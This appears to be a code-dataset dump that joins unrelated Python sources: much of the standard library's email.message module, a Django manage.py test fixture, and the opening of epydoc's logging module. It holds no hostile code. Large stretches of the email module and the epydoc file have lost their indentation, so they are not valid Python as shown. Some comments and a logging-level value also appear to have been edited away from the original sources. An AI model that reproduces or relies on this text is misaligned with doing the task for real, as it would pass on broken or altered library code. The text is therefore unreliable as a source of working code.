"""
return self.as_string()
    def as_string(self, unixfrom=False, maxheaderlen=0, policy=None):
        """Return the entire formatted message as a string.
        Optional 'unixfrom', when true, means include the Unix From_ envelope
        header. For backward compatibility reasons, if maxheaderlen is
        not specified it defaults to 0, so you must override it explicitly
        if you want a different maxheaderlen. 'policy' is passed to the
        Generator instance used to serialize the message; if it is not
        specified the policy associated with the message instance is used.
        If the message object contains binary data that is not encoded
        according to RFC standards, the non-compliant data will be replaced by
        unicode "unknown character" code points.
        """
        # Local import — presumably to avoid a circular import with
        # email.generator (TODO confirm).
        from email.generator import Generator
        policy = self.policy if policy is None else policy
        fp = StringIO()
        g = Generator(fp,
                      mangle_from_=False,
                      maxheaderlen=maxheaderlen,
                      policy=policy)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()
def __bytes__(self):
"""Return the entire formatted message as a bytes object.
"""
return self.as_bytes()
def as_bytes(self, unixfrom=False, policy=None):
"""Return the entire formatted message as a bytes object.
Optional 'unixfrom', when true, means include the Unix From_ envelope
header. 'policy' is passed to the BytesGenerator instance used to
serialize the message; if not specified the policy associated with
the message instance is used.
"""
from email.generator import BytesGenerator
policy = self.policy if policy is None else policy
fp = BytesIO()
g = BytesGenerator(fp, mangle_from_=False, policy=policy)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
def is_multipart(self):
"""Return True if the message consists of multiple parts."""
return isinstance(self._payload, list)
#
# Unix From_ line
#
def set_unixfrom(self, unixfrom):
self._unixfrom = unixfrom
def get_unixfrom(self):
return self._unixfrom
#
# Payload manipulation.
#
    def attach(self, payload):
        """Add the given payload to the current payload.
        The current payload will always be a list of objects after this method
        is called. If you want to set the payload to a scalar object, use
        set_payload() instead.
        """
        if self._payload is None:
            # First subpart: become a multipart-style (list) payload.
            self._payload = [payload]
        else:
            try:
                self._payload.append(payload)
            except AttributeError:
                # A scalar (e.g. str) payload has no .append; surface the
                # misuse as the historical TypeError rather than the raw
                # AttributeError.
                raise TypeError("Attach is not valid on a message with a"
                                " non-multipart payload")
    def get_payload(self, i=None, decode=False):
        """Return a reference to the payload.
        The payload will either be a list object or a string. If you mutate
        the list object, you modify the message's payload in place. Optional
        i returns that index into the payload.
        Optional decode is a flag indicating whether the payload should be
        decoded or not, according to the Content-Transfer-Encoding header
        (default is False).
        When True and the message is not a multipart, the payload will be
        decoded if this header's value is `quoted-printable' or `base64'. If
        some other encoding is used, or the header is missing, or if the
        payload has bogus data (i.e. bogus base64 or uuencoded data), the
        payload is returned as-is.
        If the message is a multipart and the decode flag is True, then None
        is returned.
        """
        # Here is the logic table for this code, based on the email5.0.0 code:
        #   i     decode  is_multipart  result
        # ------  ------  ------------  ------------------------------
        #  None   True    True          None
        #   i     True    True          None
        #  None   False   True          _payload (a list)
        #   i     False   True          _payload element i (a Message)
        #   i     False   False         error (not a list)
        #   i     True    False         error (not a list)
        #  None   False   False         _payload
        #  None   True    False         _payload decoded (bytes)
        # Note that Barry planned to factor out the 'decode' case, but that
        # isn't so easy now that we handle the 8 bit data, which needs to be
        # converted in both the decode and non-decode path.
        if self.is_multipart():
            if decode:
                return None
            if i is None:
                return self._payload
            else:
                return self._payload[i]
        # For backward compatibility, Use isinstance and this error message
        # instead of the more logical is_multipart test.
        if i is not None and not isinstance(self._payload, list):
            raise TypeError('Expected list, got %s' % type(self._payload))
        payload = self._payload
        # cte might be a Header, so for now stringify it.
        cte = str(self.get('content-transfer-encoding', '')).lower()
        # payload may be bytes here.
        if isinstance(payload, str):
            if utils._has_surrogates(payload):
                # Raw 8-bit bytes were smuggled into the str via
                # surrogateescape; recover the original bytes.
                bpayload = payload.encode('ascii', 'surrogateescape')
                if not decode:
                    try:
                        payload = bpayload.decode(self.get_param('charset', 'ascii'), 'replace')
                    except LookupError:
                        # Unknown charset name: fall back to ascii/replace.
                        payload = bpayload.decode('ascii', 'replace')
            elif decode:
                try:
                    bpayload = payload.encode('ascii')
                except UnicodeError:
                    # This won't happen for RFC compliant messages (messages
                    # containing only ASCII codepoints in the unicode input).
                    # If it does happen, turn the string into bytes in a way
                    # guaranteed not to fail.
                    bpayload = payload.encode('raw-unicode-escape')
        if not decode:
            return payload
        # NOTE(review): if _payload were actually bytes (see "may be bytes"
        # comment above) with decode=True, 'bpayload' would be unbound in the
        # CTE branches below; presumably _payload is always a str by this
        # point — confirm against the parser.
        if cte == 'quoted-printable':
            return quopri.decodestring(bpayload)
        elif cte == 'base64':
            # XXX: this is a bit of a hack; decode_b should probably be factored
            # out somewhere, but I haven't figured out where yet.
            value, defects = decode_b(b''.join(bpayload.splitlines()))
            for defect in defects:
                self.policy.handle_defect(self, defect)
            return value
        elif cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
            in_file = BytesIO(bpayload)
            out_file = BytesIO()
            try:
                uu.decode(in_file, out_file, quiet=True)
                return out_file.getvalue()
            except uu.Error:
                # Some decoding problem
                return bpayload
        if isinstance(payload, str):
            # Unrecognized (or missing) CTE: return the bytes form as-is.
            return bpayload
        return payload
    def set_payload(self, payload, charset=None):
        """Set the payload to the given value.
        Optional charset sets the message's default character set. See
        set_charset() for details.
        """
        # 'encode' attribute means payload is a str (or str-like object).
        if hasattr(payload, 'encode'):
            if charset is None:
                self._payload = payload
                return
            if not isinstance(charset, Charset):
                charset = Charset(charset)
            # Convert the str payload to bytes in the charset's output form.
            payload = payload.encode(charset.output_charset)
        if hasattr(payload, 'decode'):
            # bytes payload: store internally as a surrogateescape'd str so
            # the model keeps a str payload without losing byte values.
            self._payload = payload.decode('ascii', 'surrogateescape')
        else:
            self._payload = payload
        if charset is not None:
            self.set_charset(charset)
def set_charset(self, charset):
"""Set the charset of the payload to a given character set.
charset can be a Charset instance, a string naming a character set, or
None. If it is a string it will be converted to a Charset instance.
If charset is None, the charset parameter will be removed from the
Content-Type field. Anything else will generate a TypeError.
The message will be assumed to be of type text/* encoded with
charset.input_charset. It will be converted to charset.output_charset
and encoded properly, if needed, when generating the plain text
representation of the message. MIME headers (MIME-Version,
Content-Type, Content-Transfer-Encoding) will be added as needed.
"""
if charset is None:
self.del_param('charset')
self._charset = None
return
if not isinstance(charset, Charset):
charset = Charset(charset)
self._charset = charset
if 'MIME-Version' not in self:
self.add_header('MIME-Version', '1.0')
if 'Content-Type' not in self:
self.add_header('Content-Type', 'text/plain',
charset=charset.get_output_charset())
else:
self.set_param('charset', charset.get_output_charset())
if charset != charset.get_output_charset():
self._payload = charset.body_encode(self._payload)
if 'Content-Transfer-Encoding' not in self:
cte = charset.get_body_encoding()
try:
cte(self)
except TypeError:
# This 'if' is for backward compatibility, it allows unicode
# through even though that won't work correctly if the
# message is serialized.
payload = self._payload
if payload:
try:
payload = payload.encode('ascii', 'surrogateescape')
except UnicodeError:
payload = payload.encode(charset.output_charset)
self._payload = charset.body_encode(payload)
self.add_header('Content-Transfer-Encoding', cte)
def get_charset(self):
"""Return the Charset instance associated with the message's payload.
"""
return self._charset
#
# MAPPING INTERFACE (partial)
#
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __getitem__(self, name):
"""Get a header value.
Return None if the header is missing instead of raising an exception.
Note that if the header appeared multiple times, exactly which
occurrence gets returned is undefined. Use get_all() to get all
the values matching a header field name.
"""
return self.get(name)
def __setitem__(self, name, val):
"""Set the value of a header.
Note: this does not overwrite an existing header with the same field
name. Use __delitem__() first to delete any existing headers.
"""
max_count = self.policy.header_max_count(name)
if max_count:
lname = name.lower()
found = 0
for k, v in self._headers:
if k.lower() == lname:
found += 1
if found >= max_count:
raise ValueError("There may be at most {} {} headers "
"in a message".format(max_count, name))
self._headers.append(self.policy.header_store_parse(name, val))
def __delitem__(self, name):
"""Delete all occurrences of a header, if present.
Does not raise an exception if the header is missing.
"""
name = name.lower()
newheaders = []
for k, v in self._headers:
if k.lower() != name:
newheaders.append((k, v))
self._headers = newheaders
def __contains__(self, name):
return name.lower() in [k.lower() for k, v in self._headers]
def __iter__(self):
for field, value in self._headers:
yield field
def keys(self):
"""Return a list of all the message's header field names.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all the message's header values.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [self.policy.header_fetch_parse(k, v)
for k, v in self._headers]
def items(self):
"""Get all the message's header fields and values.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [(k, self.policy.header_fetch_parse(k, v))
for k, v in self._headers]
def get(self, name, failobj=None):
"""Get a header value.
Like __getitem__() but return failobj instead of None when the field
is missing.
"""
name = name.lower()
for k, v in self._headers:
if k.lower() == name:
return self.policy.header_fetch_parse(k, v)
return failobj
#
# "Internal" methods (public API, but only intended for use by a parser
# or generator, not normal application code.
#
def set_raw(self, name, value):
"""Store name and value in the model without modification.
This is an "internal" API, intended only for use by a parser.
"""
self._headers.append((name, value))
def raw_items(self):
"""Return the (name, value) header pairs without modification.
This is an "internal" API, intended only for use by a generator.
"""
return iter(self._headers.copy())
#
# Additional useful stuff
#
def get_all(self, name, failobj=None):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original
message, and may contain duplicates. Any fields deleted and
re-inserted are always appended to the header list.
If no such fields exist, failobj is returned (defaults to None).
"""
values = []
name = name.lower()
for k, v in self._headers:
if k.lower() == name:
values.append(self.policy.header_fetch_parse(k, v))
if not values:
return failobj
return values
    def add_header(self, _name, _value, **_params):
        """Extended header setting.
        name is the header field to add. keyword arguments can be used to set
        additional parameters for the header field, with underscores converted
        to dashes. Normally the parameter will be added as key="value" unless
        value is None, in which case only the key will be added. If a
        parameter value contains non-ASCII characters it can be specified as a
        three-tuple of (charset, language, value), in which case it will be
        encoded according to RFC2231 rules. Otherwise it will be encoded using
        the utf-8 charset and a language of ''.
        Examples:
        msg.add_header('content-disposition', 'attachment', filename='bud.gif')
        msg.add_header('content-disposition', 'attachment',
                       filename=('utf-8', '', 'Fußballer.ppt'))
        msg.add_header('content-disposition', 'attachment',
                       filename='Fußballer.ppt')
        """
        parts = []
        for k, v in _params.items():
            if v is None:
                # Valueless parameter: emit just the (dash-ified) key.
                parts.append(k.replace('_', '-'))
            else:
                parts.append(_formatparam(k.replace('_', '-'), v))
        if _value is not None:
            parts.insert(0, _value)
        self[_name] = SEMISPACE.join(parts)
def replace_header(self, _name, _value):
"""Replace a header.
Replace the first matching header found in the message, retaining
header order and case. If no matching header was found, a KeyError is
raised.
"""
_name = _name.lower()
for i, (k, v) in zip(range(len(self._headers)), self._headers):
if k.lower() == _name:
self._headers[i] = self.policy.header_store_parse(k, _value)
break
else:
raise KeyError(_name)
#
# Use these three methods instead of the three above.
#
def get_content_type(self):
"""Return the message's content type.
The returned string is coerced to lower case of the form
`maintype/subtype'. If there was no Content-Type header in the
message, the default type as given by get_default_type() will be
returned. Since according to RFC 2045, messages always have a default
type this will always return a value.
RFC 2045 defines a message's default type to be text/plain unless it
appears inside a multipart/digest container, in which case it would be
message/rfc822.
"""
missing = object()
value = self.get('content-type', missing)
if value is missing:
# This should have no parameters
return self.get_default_type()
ctype = _splitparam(value)[0].lower()
# RFC 2045, section 5.2 says if its invalid, use text/plain
if ctype.count('/') != 1:
return 'text/plain'
return ctype
def get_content_maintype(self):
"""Return the message's main content type.
This is the `maintype' part of the string returned by
get_content_type().
"""
ctype = self.get_content_type()
return ctype.split('/')[0]
def get_content_subtype(self):
"""Returns the message's sub-content type.
This is the `subtype' part of the string returned by
get_content_type().
"""
ctype = self.get_content_type()
return ctype.split('/')[1]
def get_default_type(self):
"""Return the `default' content type.
Most messages have a default content type of text/plain, except for
messages that are subparts of multipart/digest containers. Such
subparts have a default content type of message/rfc822.
"""
return self._default_type
def set_default_type(self, ctype):
"""Set the `default' content type.
ctype should be either "text/plain" or "message/rfc822", although this
is not enforced. The default content type is not stored in the
Content-Type header.
"""
self._default_type = ctype
def _get_params_preserve(self, failobj, header):
# Like get_params() but preserves the quoting of values. BAW:
# should this be part of the public interface?
missing = object()
value = self.get(header, missing)
if value is missing:
return failobj
params = []
for p in _parseparam(value):
try:
name, val = p.split('=', 1)
name = name.strip()
val = val.strip()
except ValueError:
# Must have been a bare attribute
name = p.strip()
val = ''
params.append((name, val))
params = utils.decode_params(params)
return params
def get_params(self, failobj=None, header='content-type', unquote=True):
"""Return the message's Content-Type parameters, as a list.
The elements of the returned list are 2-tuples of key/value pairs, as
split on the `=' sign. The left hand side of the `=' is the key,
while the right hand side is the value. If there is no `=' sign in
the parameter the value is the empty string. The value is as
described in the get_param() method.
Optional failobj is the object to return if there is no Content-Type
header. Optional header is the header to search instead of
Content-Type. If unquote is True, the value is unquoted.
"""
missing = object()
params = self._get_params_preserve(missing, header)
if params is missing:
return failobj
if unquote:
return [(k, _unquotevalue(v)) for k, v in params]
else:
return params
def get_param(self, param, failobj=None, header='content-type',
unquote=True):
"""Return the parameter value if found in the Content-Type header.
Optional failobj is the object to return if there is no Content-Type
header, or the Content-Type header has no such parameter. Optional
header is the header to search instead of Content-Type.
Parameter keys are always compared case insensitively. The return
value can either be a string, or a 3-tuple if the parameter was RFC
2231 encoded. When it's a 3-tuple, the elements of the value are of
the form (CHARSET, LANGUAGE, VALUE). Note that both CHARSET and
LANGUAGE can be None, in which case you should consider VALUE to be
encoded in the us-ascii charset. You can usually ignore LANGUAGE.
The parameter value (either the returned string, or the VALUE item in
the 3-tuple) is always unquoted, unless unquote is set to False.
If your application doesn't care whether the parameter was RFC 2231
encoded, it can turn the return value into a string as follows:
rawparam = msg.get_param('foo')
param = email.utils.collapse_rfc2231_value(rawparam)
"""
if header not in self:
return failobj
for k, v in self._get_params_preserve(failobj, header):
if k.lower() == param.lower():
if unquote:
return _unquotevalue(v)
else:
return v
return failobj
    def set_param(self, param, value, header='Content-Type', requote=True,
                  charset=None, language='', replace=False):
        """Set a parameter in the Content-Type header.
        If the parameter already exists in the header, its value will be
        replaced with the new value.
        If header is Content-Type and has not yet been defined for this
        message, it will be set to "text/plain" and the new parameter and
        value will be appended as per RFC 2045.
        An alternate header can be specified in the header argument, and all
        parameters will be quoted as necessary unless requote is False.
        If charset is specified, the parameter will be encoded according to RFC
        2231.  Optional language specifies the RFC 2231 language, defaulting
        to the empty string.  Both charset and language should be strings.
        If replace is False (the default), the header is deleted and the new
        value re-appended to the header list; if True, the header is updated
        in place, preserving its position.
        """
        if not isinstance(value, tuple) and charset:
            # Promote to an RFC 2231 (charset, language, value) triple.
            value = (charset, language, value)
        if header not in self and header.lower() == 'content-type':
            ctype = 'text/plain'
        else:
            ctype = self.get(header)
        if not self.get_param(param, header=header):
            # Parameter not present yet: append it to the existing value.
            if not ctype:
                ctype = _formatparam(param, value, requote)
            else:
                ctype = SEMISPACE.join(
                    [ctype, _formatparam(param, value, requote)])
        else:
            # Parameter already present: rebuild the whole header value,
            # swapping in the new value where the parameter name matches.
            ctype = ''
            for old_param, old_value in self.get_params(header=header,
                                                        unquote=requote):
                append_param = ''
                if old_param.lower() == param.lower():
                    append_param = _formatparam(param, value, requote)
                else:
                    append_param = _formatparam(old_param, old_value, requote)
                if not ctype:
                    ctype = append_param
                else:
                    ctype = SEMISPACE.join([ctype, append_param])
        if ctype != self.get(header):
            if replace:
                self.replace_header(header, ctype)
            else:
                del self[header]
                self[header] = ctype
def del_param(self, param, header='content-type', requote=True):
"""Remove the given parameter completely from the Content-Type header.
The header will be re-written in place without the parameter or its
value. All values will be quoted as necessary unless requote is
False. Optional header specifies an alternative to the Content-Type
header.
"""
if header not in self:
return
new_ctype = ''
for p, v in self.get_params(header=header, unquote=requote):
if p.lower() != param.lower():
if not new_ctype:
new_ctype = _formatparam(p, v, requote)
else:
new_ctype = SEMISPACE.join([new_ctype,
_formatparam(p, v, requote)])
if new_ctype != self.get(header):
del self[header]
self[header] = new_ctype
def set_type(self, type, header='Content-Type', requote=True):
"""Set the main type and subtype for the Content-Type header.
type must be a string in the form "maintype/subtype", otherwise a
ValueError is raised.
This method replaces the Content-Type header, keeping all the
parameters in place. If requote is False, this leaves the existing
header's quoting as is. Otherwise, the parameters will be quoted (the
default).
An alternative header can be specified in the header argument. When
the Content-Type header is set, we'll always also add a MIME-Version
header.
"""
# BAW: should we be strict?
if not type.count('/') == 1:
raise ValueError
# Set the Content-Type, you get a MIME-Version
if header.lower() == 'content-type':
del self['mime-version']
self['MIME-Version'] = '1.0'
if header not in self:
self[header] = type
return
params = self.get_params(header=header, unquote=requote)
del self[header]
self[header] = type
# Skip the first param; it's the old type.
for p, v in params[1:]:
self.set_param(p, v, header, requote)
def get_filename(self, failobj=None):
"""Return the filename associated with the payload if present.
The filename is extracted from the Content-Disposition header's
`filename' parameter, and it is unquoted. If that header is missing
the `filename' parameter, this method falls back to looking for the
`name' parameter.
"""
missing = object()
filename = self.get_param('filename', missing, 'content-disposition')
if filename is missing:
filename = self.get_param('name', missing, 'content-type')
if filename is missing:
return failobj
return utils.collapse_rfc2231_value(filename).strip()
def get_boundary(self, failobj=None):
"""Return the boundary associated with the payload if present.
The boundary is extracted from the Content-Type header's `boundary'
parameter, and it is unquoted.
"""
missing = object()
boundary = self.get_param('boundary', missing)
if boundary is missing:
return failobj
# RFC 2046 says that boundaries may begin but not end in w/s
return utils.collapse_rfc2231_value(boundary).rstrip()
def set_boundary(self, boundary):
"""Set the boundary parameter in Content-Type to 'boundary'.
This is subtly different than deleting the Content-Type header and
adding a new one with a new boundary parameter via add_header(). The
main difference is that using the set_boundary() method preserves the
order of the Content-Type header in the original message.
HeaderParseError is raised if the message has no Content-Type header.
"""
missing = object()
params = self._get_params_preserve(missing, 'content-type')
if params is missing:
# There was no Content-Type header, and we don't know what type
# to set it to, so raise an exception.
raise errors.HeaderParseError('No Content-Type header found')
newparams = []
foundp = False
for pk, pv in params:
if pk.lower() == 'boundary':
newparams.append(('boundary', '"%s"' % boundary))
foundp = True
else:
newparams.append((pk, pv))
if not foundp:
# The original Content-Type header had no boundary attribute.
# Tack one on the end. BAW: should we raise an exception
# instead???
newparams.append(('boundary', '"%s"' % boundary))
# Replace the existing Content-Type header with the new value
newheaders = []
for h, v in self._headers:
if h.lower() == 'content-type':
parts = []
for k, v in newparams:
if v == '':
parts.append(k)
else:
parts.append('%s=%s' % (k, v))
val = SEMISPACE.join(parts)
newheaders.append(self.policy.header_store_parse(h, val))
else:
newheaders.append((h, v))
self._headers = newheaders
def get_content_charset(self, failobj=None):
"""Return the charset parameter of the Content-Type header.
The returned string is always coerced to lower case. If there is no
Content-Type header, or if that header has no charset parameter,
failobj is returned.
"""
missing = object()
charset = self.get_param('charset', missing)
if charset is missing:
return failobj
if isinstance(charset, tuple):
# RFC 2231 encoded, so decode it, and it better end up as ascii.
pcharset = charset[0] or 'us-ascii'
try:
# LookupError will be raised if the charset isn't known to
# Python. UnicodeError will be raised if the encoded text
# contains a character not in the charset.
as_bytes = charset[2].encode('raw-unicode-escape')
charset = str(as_bytes, pcharset)
except (LookupError, UnicodeError):
charset = charset[2]
# charset characters must be in us-ascii range
try:
charset.encode('us-ascii')
except UnicodeError:
return failobj
# RFC 2046, $4.1.2 says charsets are not case sensitive
return charset.lower()
def get_charsets(self, failobj=None):
"""Return a list containing the charset(s) used in this message.
The returned list of items describes the Content-Type headers'
charset parameter for this message and all the subparts in its
payload.
Each item will either be a string (the value of the charset parameter
in the Content-Type header of that part) or the value of the
'failobj' parameter (defaults to None), if the part does not have a
main MIME type of "text", or the charset is not defined.
The list will contain one string for each part of the message, plus
one for the container message (i.e. self), so that a non-multipart
message will still return a list of length 1.
"""
return [part.get_content_charset(failobj) for part in self.walk()]
# I.e. def walk(self): ...
from email.iterators import walk
# XXX Support for temporary deprecation hack for is_attachment property.
class _IsAttachment:
    """Deprecation shim returned by MIMEPart.is_attachment.

    Wraps the boolean answer so that both the old property-style use
    (truth testing) and the future method-style use (calling) work; truth
    testing additionally emits a DeprecationWarning.
    """
    def __init__(self, value):
        # The underlying bool answer.
        self.value = value
    def __call__(self):
        # New-style (method) access: no warning.
        return self.value
    def __bool__(self):
        # Old-style (property/truthiness) access: warn, then answer.
        warnings.warn("is_attachment will be a method, not a property, in 3.5",
                      DeprecationWarning,
                      stacklevel=3)
        return self.value
class MIMEPart(Message):
def __init__(self, policy=None):
if policy is None:
from email.policy import default
policy = default
Message.__init__(self, policy)
    @property
    def is_attachment(self):
        """Whether this part's Content-Disposition is 'attachment'.

        Returns an _IsAttachment shim (callable and truthy) as a transition
        aid; truth-testing it emits a DeprecationWarning.
        """
        c_d = self.get('content-disposition')
        # NOTE(review): relies on the policy returning a header object with a
        # .content_disposition attribute (true for email.policy.default, the
        # MIMEPart default) — would fail under compat32; confirm.
        result = False if c_d is None else c_d.content_disposition == 'attachment'
        # XXX transitional hack to raise deprecation if not called.
        return _IsAttachment(result)
def _find_body(self, part, preferencelist):
if part.is_attachment():
return
maintype, subtype = part.get_content_type().split('/')
if maintype == 'text':
if subtype in preferencelist:
yield (preferencelist.index(subtype), part)
return
if maintype != 'multipart':
return
if subtype != 'related':
for subpart in part.iter_parts():
yield from self._find_body(subpart, preferencelist)
return
if 'related' in preferencelist:
yield (preferencelist.index('related'), part)
candidate = None
start = part.get_param('start')
if start:
for subpart in part.iter_parts():
if subpart['content-id'] == start:
candidate = subpart
break
if candidate is None:
subparts = part.get_payload()
candidate = subparts[0] if subparts else None
if candidate is not None:
yield from self._find_body(candidate, preferencelist)
def get_body(self, preferencelist=('related', 'html', 'plain')):
"""Return best candidate mime part for display as 'body' of message.
Do a depth first search, starting with self, looking for the first part
matching each of the items in preferencelist, and return the part
corresponding to the first item that has a match, or None if no items
have a match. If 'related' is not included in preferencelist, consider
the root part of any multipart/related encountered as a candidate
match. Ignore parts with 'Content-Disposition: attachment'.
"""
best_prio = len(preferencelist)
body = None
for prio, part in self._find_body(self, preferencelist):
if prio < best_prio:
best_prio = prio
body = part
if prio == 0:
break
return body
_body_types = {('text', 'plain'),
('text', 'html'),
('multipart', 'related'),
('multipart', 'alternative')}
def iter_attachments(self):
"""Return an iterator over the non-main parts of a multipart.
Skip the first of each occurrence of text/plain, text/html,
multipart/related, or multipart/alternative in the multipart (unless
they have a 'Content-Disposition: attachment' header) and include all
remaining subparts in the returned iterator. When applied to a
multipart/related, return all parts except the root part. Return an
empty iterator when applied to a multipart/alternative or a
non-multipart.
"""
maintype, subtype = self.get_content_type().split('/')
if maintype != 'multipart' or subtype == 'alternative':
return
parts = self.get_payload()
if maintype == 'multipart' and subtype == 'related':
# For related, we treat everything but the root as an attachment.
# The root may be indicated by 'start'; if there's no start or we
# can't find the named start, treat the first subpart as the root.
start = self.get_param('start')
if start:
found = False
attachments = []
for part in parts:
if part.get('content-id') == start:
found = True
else:
attachments.append(part)
if found:
yield from attachments
return
parts.pop(0)
yield from parts
return
# Otherwise we more or less invert the remaining logic in get_body.
# This only really works in edge cases (ex: non-text relateds or
# alternatives) if the sending agent sets content-disposition.
seen = [] # Only skip the first example of each candidate type.
for part in parts:
maintype, subtype = part.get_content_type().split('/')
if ((maintype, subtype) in self._body_types and
not part.is_attachment() and subtype not in seen):
seen.append(subtype)
continue
yield part
def iter_parts(self):
"""Return an iterator over all immediate subparts of a multipart.
Return an empty iterator for a non-multipart.
"""
if self.get_content_maintype() == 'multipart':
yield from self.get_payload()
def get_content(self, *args, content_manager=None, **kw):
if content_manager is None:
content_manager = self.policy.content_manager
return content_manager.get_content(self, *args, **kw)
def set_content(self, *args, content_manager=None, **kw):
if content_manager is None:
content_manager = self.policy.content_manager
content_manager.set_content(self, *args, **kw)
    def _make_multipart(self, subtype, disallowed_subtypes, boundary):
        """Convert this message into a multipart/<subtype> container.

        Any existing Content-* headers (and the current payload) are moved
        into a new first subpart; all other headers remain on this message.

        @param subtype: target multipart subtype ('related', 'alternative',
            or 'mixed').
        @param disallowed_subtypes: existing multipart subtypes that may not
            be converted to *subtype*.
        @param boundary: optional explicit multipart boundary parameter.
        Raises ValueError if the message is already a multipart whose
        subtype cannot be converted (including converting to itself).
        """
        if self.get_content_maintype() == 'multipart':
            existing_subtype = self.get_content_subtype()
            disallowed_subtypes = disallowed_subtypes + (subtype,)
            if existing_subtype in disallowed_subtypes:
                raise ValueError("Cannot convert {} to {}".format(
                    existing_subtype, subtype))
        keep_headers = []
        part_headers = []
        # Content-* headers describe the current payload and must travel
        # with it; everything else stays on the container message.
        for name, value in self._headers:
            if name.lower().startswith('content-'):
                part_headers.append((name, value))
            else:
                keep_headers.append((name, value))
        if part_headers:
            # There is existing content, move it to the first subpart.
            part = type(self)(policy=self.policy)
            part._headers = part_headers
            part._payload = self._payload
            self._payload = [part]
        else:
            self._payload = []
        self._headers = keep_headers
        self['Content-Type'] = 'multipart/' + subtype
        if boundary is not None:
            self.set_param('boundary', boundary)
def make_related(self, boundary=None):
self._make_multipart('related', ('alternative', 'mixed'), boundary)
def make_alternative(self, boundary=None):
self._make_multipart('alternative', ('mixed',), boundary)
def make_mixed(self, boundary=None):
self._make_multipart('mixed', (), boundary)
def _add_multipart(self, _subtype, *args, _disp=None, **kw):
if (self.get_content_maintype() != 'multipart' or
self.get_content_subtype() != _subtype):
getattr(self, 'make_' + _subtype)()
part = type(self)(policy=self.policy)
part.set_content(*args, **kw)
if _disp and 'content-disposition' not in part:
part['Content-Disposition'] = _disp
self.attach(part)
def add_related(self, *args, **kw):
self._add_multipart('related', *args, _disp='inline', **kw)
def add_alternative(self, *args, **kw):
self._add_multipart('alternative', *args, **kw)
def add_attachment(self, *args, **kw):
self._add_multipart('mixed', *args, _disp='attachment', **kw)
def clear(self):
self._headers = []
self._payload = None
def clear_content(self):
self._headers = [(n, v) for n, v in self._headers
if not n.lower().startswith('content-')]
self._payload = None
class EmailMessage(MIMEPart):
    """A MIMEPart suitable for use as a top-level message object."""

    def set_content(self, *args, **kw):
        """Set the content, then ensure a MIME-Version header exists."""
        super().set_content(*args, **kw)
        if 'MIME-Version' in self:
            return
        self['MIME-Version'] = '1.0'
|
modulexcite/PTVS | refs/heads/master | Python/Tests/TestData/WFastCgi/DjangoSimpleAppUrlRewrite/manage.py | 56 | #!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    # Point Django at this project's settings module unless the
    # environment already specifies one.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DjangoApplication.settings")

    from django.core.management import execute_from_command_line

    # Dispatch whatever management command was given on the command line.
    execute_from_command_line(sys.argv)
|
suncycheng/intellij-community | refs/heads/master | python/helpers/epydoc/log.py | 99 | # epydoc -- Logging
#
# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <edloper@loper.org>
# URL: <http://epydoc.sf.net>
#
# $Id: log.py 1488 2007-02-14 00:34:27Z edloper $
"""
Functions used to report messages and progress updates to the user.
These functions are delegated to zero or more registered L{Logger}
objects, which are responsible for actually presenting the information
to the user. Different interfaces are free to create and register
their own C{Logger}s, allowing them to present this information in the
manner that is best suited to each interface.
@note: I considered using the standard C{logging} package to provide
this functionality. However, I found that it would be too difficult
to get that package to provide the behavior I want (esp. with respect
to progress displays; but also with respect to message blocks).
@group Message Severity Levels: DEBUG, INFO, WARNING, ERROR, FATAL
"""
__docformat__ = 'epytext en'
import sys, os
# Message severity levels, ordered by increasing importance.  Loggers
# compare these against a threshold (e.g. SimpleLogger), so each level
# must be distinct and FATAL must remain the highest.
DEBUG = 10
INFO = 20
DOCSTRING_WARNING = 25
WARNING = 30
ERROR = 40
# Was 40, which made FATAL indistinguishable from ERROR; 50 keeps FATAL
# above ERROR while still passing every `level >= threshold` check that
# the old value passed.
FATAL = 50
######################################################################
# Logger Base Class
######################################################################
class Logger:
    """
    An abstract base class that defines the interface for X{loggers},
    which are used by epydoc to report information back to the user.
    Loggers are responsible for tracking two types of information:
      - Messages, such as warnings and errors.
      - Progress on the current task.

    This abstract class allows the command-line interface and the
    graphical interface to each present this information to the user
    in the way that's most natural for each interface.  To set up a
    logger, create a subclass of C{Logger} that overrides all methods,
    and register it using L{register_logger}.
    """
    # All methods below are intentionally no-ops: this base class only
    # defines the interface, and registered loggers override the pieces
    # they care about.

    #////////////////////////////////////////////////////////////
    # Messages
    #////////////////////////////////////////////////////////////

    def log(self, level, message):
        """
        Display a message.

        @param message: The message string to display.  C{message} may
        contain newlines, but does not need to end in a newline.
        @param level: An integer value indicating the severity of the
        message.
        """

    def close(self):
        """
        Perform any tasks needed to close this logger.
        """

    #////////////////////////////////////////////////////////////
    # Message blocks
    #////////////////////////////////////////////////////////////

    def start_block(self, header):
        """
        Start a new message block.  Any calls to L{info()},
        L{warning()}, or L{error()} that occur between a call to
        C{start_block} and a corresponding call to C{end_block} will
        be grouped together, and displayed with a common header.
        C{start_block} can be called multiple times (to form nested
        blocks), but every call to C{start_block} I{must} be balanced
        by a call to C{end_block}.
        """

    def end_block(self):
        """
        End a warning block.  See L{start_block} for details.
        """

    #////////////////////////////////////////////////////////////
    # Progress bar
    #////////////////////////////////////////////////////////////

    def start_progress(self, header=None):
        """
        Begin displaying progress for a new task.  C{header} is a
        description of the task for which progress is being reported.
        Each call to C{start_progress} must be followed by a call to
        C{end_progress} (with no intervening calls to
        C{start_progress}).
        """

    def end_progress(self):
        """
        Finish off the display of progress for the current task.  See
        L{start_progress} for more information.
        """

    def progress(self, percent, message=''):
        """
        Update the progress display.

        @param percent: A float from 0.0 to 1.0, indicating how much
        progress has been made.
        @param message: A message indicating the most recent action
        that contributed towards that progress.
        """
class SimpleLogger(Logger):
def __init__(self, threshold=WARNING):
self.threshold = threshold
def log(self, level, message):
if level >= self.threshold: print message
######################################################################
# Logger Registry
######################################################################
